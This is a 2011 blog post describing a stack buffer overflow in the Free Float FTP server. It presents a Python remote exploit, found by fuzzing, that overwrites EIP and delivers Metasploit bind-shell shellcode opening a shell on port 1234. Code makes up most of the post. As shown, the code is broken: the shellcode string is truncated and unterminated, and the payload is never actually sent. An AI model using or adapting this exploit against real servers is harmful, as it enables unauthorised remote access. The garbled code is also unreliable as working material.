Wednesday, September 28, 2011

Free Float Ftp server stack buffer overflow

First of all i fired Metasploit Fuzzer aginst this FTP server.The fuzzer worked like butter.
Near 250 bytes of Junk the program crashed and checked the yahoooooo....the offset was overwritten with metasploit pattern.
I started writing the exploit.Like always python is my best choice for writing exploits.So the exploit code is in python.
The shell code added with the exploit is spawns a bindshell on port 1234.
generated form Metasplot frmaework.
The bad characters are removed form the shell code using metasplot encoder.

I have published this exploit @ packet sortm security and Injector

You can find the exploit code @
# Exploit Title: Free Float FTP server Response stack Buffer Overflow Exploit
# Date: 21-08-2011
# Author: Debasish Mandal
# Software Link:
# Version: 1.0
# Category:: Remote
# Tested on: Windows XP SP2.


import  socket,sys
from struct import pack

buff = "A"* 251 
junk = "A"*5
nop = "\x90"*20
eip = pack('<L',0x77F5801C)

#Shell code generated by Metasploit frmaework.
#Shell Code :: windows/shell/bind_tcp.
#Local PORT :: 1234.
#Neglected BAD CHARACTERS  are "\x00","\x0a" &\x0d".
shellcode = ("\xbd\xe6\x09\xc6\x4f\xd9\xc4\xd9\x74\x24\xf4\x5a\x33\xc9\xb1"

buff += eip
buff += nop
buff += shellcode
buff += junk
HOST = raw_input("Enter the target host : ")
PORT = raw_input("Enter the targer port (Default 21): ")
print "[*] Connecting to the host "+HOST+" on port "+PORT 
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((HOST, int(PORT)))
print "[*]Connected to target FTP Server!"
print "[*] FTP Server didn't respond\n"
print "[*]Sending PAYLOAD to the target server"
print "[*]Exploit Completed..."
print "[*]Now telnet to the server on port 1234"

# [2011-08-21]